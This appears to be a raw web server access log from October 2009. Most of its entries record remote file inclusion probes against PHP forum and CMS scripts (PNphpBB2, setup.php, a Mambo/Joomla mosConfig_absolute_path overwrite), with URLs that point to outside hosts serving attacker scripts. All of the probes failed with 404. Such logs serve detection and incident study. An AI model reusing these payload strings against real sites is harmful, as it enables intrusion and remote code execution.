222.122.72.216 - - [13/Oct/2009:01:26:19 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [13/Oct/2009:01:26:19 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.72.216 - - [13/Oct/2009:01:26:19 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:27:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.164 - - [13/Oct/2009:01:27:56 -0400] "GET //setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:27:56 -0400] "GET /logs//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:27:56 -0400] "GET /logs/access_log.Q109092000//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:27:59 -0400] "GET /logs//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:27:59 -0400] "GET //setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:27:59 -0400] "GET /logs/access_log.Q109092000//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:01:28:17 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
174.143.3.188 - - [13/Oct/2009:01:28:17 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
